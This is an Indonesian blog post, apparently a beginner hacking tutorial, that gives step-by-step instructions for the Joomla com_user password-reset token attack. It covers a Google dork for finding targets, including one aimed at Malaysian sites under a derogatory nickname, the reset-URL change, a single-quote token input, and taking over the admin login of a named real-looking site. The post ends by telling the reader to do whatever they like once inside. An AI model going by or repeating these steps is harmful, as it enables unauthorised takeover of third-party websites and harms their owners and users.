Mungkin cara Hacking dengan Token seperti ini tel;ah usang, namun saya hanya berbagi untuk yang masih newbie siapa tau masih ada yang kurang paham dan mau mencobanya.
Cara Token ini pernah saya lakukan dan berhasil...(kemungkinan keberuntungan walaupun terkadang susah)
Oke langsung aja dari pada cuap-cuap trus..
oke...apalah salahnya klu kita coba...hehehehe...
Pertama --> cari target dengan dork inurl:option=com_user daerah/negara tujuanMisal kita nyari target malingsia maka :
inurl:option=com_user site:.my
Tuh ada,
http://www.excelphone.com.my/index.php?o...k=register
Kedua --> Ganti Opsi alamat web mulai dari option hingga akhir dengan option=com_user&view=reset&layout=confirm
Contoh :
http://www.excelphone.com.my/index.php?o...ut=confirm
Kemudian Keluar Confirmasi Account dengan menyuruh user memasukkan token
Ketiga --> Isi token dengan tanda single quote (')
Jika web ada vulnerabilitynya maka kita telah berhasil membuat reset password tersebut..
Keempat --> Tinggal isi password terserah kita yang akan kita gunkan untuk login nanti
Kelima --> Tinggal nyari halaman login admin nya
Contoh : http://www.excelphone.com.my/administrator/
Disini kita akan mengadu keberuntungan dengan menebak apa nama username adminnya..
Kalau udah masuk terserah deh mau diapain
NB; selagi mau berlajar dan berusaha pasti ditemukan cara dan keberhasilan..
semua ini demi kemajuan ilmu pengetahuan.
mohon maaf apabila ada kekeliruan dan kekurangan semoga dapat disempurnakan..Trims.
0 comments:
Post a Comment